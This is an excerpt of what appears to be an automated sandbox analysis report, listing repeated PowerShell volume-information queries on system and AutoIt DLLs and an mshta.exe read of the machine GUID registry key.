Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs